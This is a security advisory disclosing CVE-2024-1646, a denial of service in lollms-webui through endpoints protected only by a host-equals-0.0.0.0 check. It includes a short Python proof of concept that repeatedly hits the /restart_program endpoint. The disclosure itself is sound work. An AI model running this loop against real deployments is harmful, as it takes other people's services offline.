JFrog Security Research
< Back

JFSA-2024-001028815 - lollms-webui exposued endpoints DoS

CVE-2024-1646 | CVSS 8.2

JFrog Severity:high

Discovered ByNaveh Racovskyof the JFrog Security Research Team

Published 15 Apr, 2024 | Last updated 15 Apr, 2024

Exposed endpoints in lollms-webui leads to denial of service

parisneo/lollms-webui

(,9.2], Fixed in 9.3

Multiple sensitive endpoints are not well-protected from access by outside actors. The current protection checks whether the host parameter isn't 0.0.0.0.

if lollmsElfServer.config.host=="0.0.0.0"

However, the application may be run exposed to a specific interface, in which case this check will be insufficient.

// PoC.py
import requests
from time import sleep
IP_ADDRESS = "aaa.bbb.ccc.ddd" #Change this to the address of the chosen interface
PORT = 9600

while True:
    try:
        response = requests.get(f"http://{IP_ADDRESS}:{str(PORT)}/restart_program")
        print(response.json())
    except Exception:
        pass
    sleep(1)

No mitigations are supplied for this issue

Advisory

< Back